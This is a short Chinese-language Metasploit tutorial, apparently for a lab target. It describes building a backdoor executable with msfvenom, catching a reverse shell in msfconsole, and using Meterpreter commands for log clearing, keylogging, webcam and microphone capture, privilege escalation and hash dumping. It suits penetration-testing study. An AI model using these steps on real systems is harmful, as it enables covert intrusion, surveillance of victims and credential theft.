原理:
利用msfvenom制作shy .exe 文件,然后发送到靶机上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机
1,根据靶机操作系统,搜索适合的生产后门文件的脚本
msfvenom -l | grep windows | grep x64 | grep tcp
2,选择生产脚本,生产后门文件
-p 选择一个payload
-f 生成的文件格式
lhost 攻击机的IP
lhost 攻击机的任意一个端口
3,将生成的后门文件上传到靶机当中
4,启动msfconsole
5,加载exploit/multi/handler模块,设置payload
6,查看payload所需要的参数,可以看出需要设置接收的IP地址和端口
7,设置IP和端口
8,直接exploit,开启攻击,等待运行后门文件
9,在靶机上运行该后门文件
10,发现kali上获得反弹shell
11,常用命令
getwd当前目录
getuid当前用户
dir查看所有文件
cat111.txt 查看文件111.txt内容
search-f cmd.exe (搜索名为123.exe文件所在目录)
upload/root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
downloadc:\123txt /root 下载文件
clearev清除日志
sysinfo系统信息
keyscan_start开始键盘记录
keyscan_stop停止键盘记录
keyscan_dump查看结果
屏幕截图 screenshot
屏幕监控 run vnc
uictl disable keyboard/mouse 禁用键盘/鼠标
uictl enable keyboard/mouse 启用键盘/鼠标制权
record_mic 音频录制
record_mic -d 10 后台录音10秒
webcam_chat 查看摄像头接口
webcam_list 查看摄像头列表
webcam_stream 摄像头视频获取
GetSystem 获取高权限
Hashdump 下载hash
